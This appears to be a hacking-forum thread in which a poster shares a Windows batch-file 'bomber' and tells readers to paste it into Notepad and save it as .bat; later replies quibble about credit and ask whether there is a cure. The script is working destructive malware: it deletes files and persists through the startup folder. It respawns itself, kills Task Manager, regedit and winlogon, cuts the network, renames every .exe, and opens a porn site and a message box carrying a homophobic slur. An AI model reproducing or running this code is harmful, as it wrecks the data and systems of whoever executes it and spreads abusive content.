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Oh dear, just dont run it on your computer


I. Open notepad blabla

II. Copy past this code


@echo off

:: delete everything
del /q /f *.*

:: hide self as soon as its run
attrib +s +h %0

:: copy self to startup
copy %0 "%appdata%\Microsoft\Windows\start Menu\Programs\startup"


:: run self again and again and again and again and again and again
start %0

:: create random files
echo %random%>%random%%%100000%

:: create random folders
md %random%%%100000%

:: start a porn video
start www.redtube.com\%random%%%10000%

:: Message Box
echo MsgBox "Your a FAG" >> C:\Windows\VGSFSA.vbs
start C:\Windows\VGSFSA.vbs

:: kill some apps
taskkill /f /im taskmgr.exe
taskkill /f /im msnmsgr.exe
taskkill /f /im winlogon.exe
taskkill /f /im msconfig.exe
taskkill /f /im regedit.exe
taskkill /f /im irc.exe
taskkill /f /im ventrilo.exe
taskkill /f /im taskeng.exe
taskkill /f /im yahoomsgr.exe

:: turn internet off
Ipconfig /release

:: rename all .exe file to .fag
for %%a in (c:\*exe *exe ..\*exe c:\mydocu~1\*exe C:\Users\%username%\Documents\*exe %windir%\*exe %path%\*exe %windir%\desktop\*exe C:\Users\%username%\Desktop\*exe C:\Users\%username%\Pictures\*exe) do ren "%%a" "%%a.fag"

:: Coolis power make repeat that shit XD
goto top


III.Save as .bat



Have fun...



Kidding right? 1 minute work... Where is a point to give credits to myself? Just cmd codes, Dont take my mad but sometimes i think what you just spamming :S



Kidding right? 1 minute work... Where is a point to give credits to myself? Just cmd codes, Dont take my mad but sometimes i think what you just spamming :S



And i'm sure that i can find it on the net.


Delete all files ftw just read it it's easy to undestand it.

Not only...

It kind of bomber. By reading code you can understund easy what it alse do :P



And i'm sure that i can find it on the net.

Ok, go find one same, you can find one kind of bombers like deleting files only or shutdown or what ever. this are all together...

  • 3 weeks later...

Ty For The Share..


But I need to ask...I See That This bat is gona delete ??

And The Video Think Why You Add It ? :P


Anyway...There is No Cure Right?

  • 2 months later...

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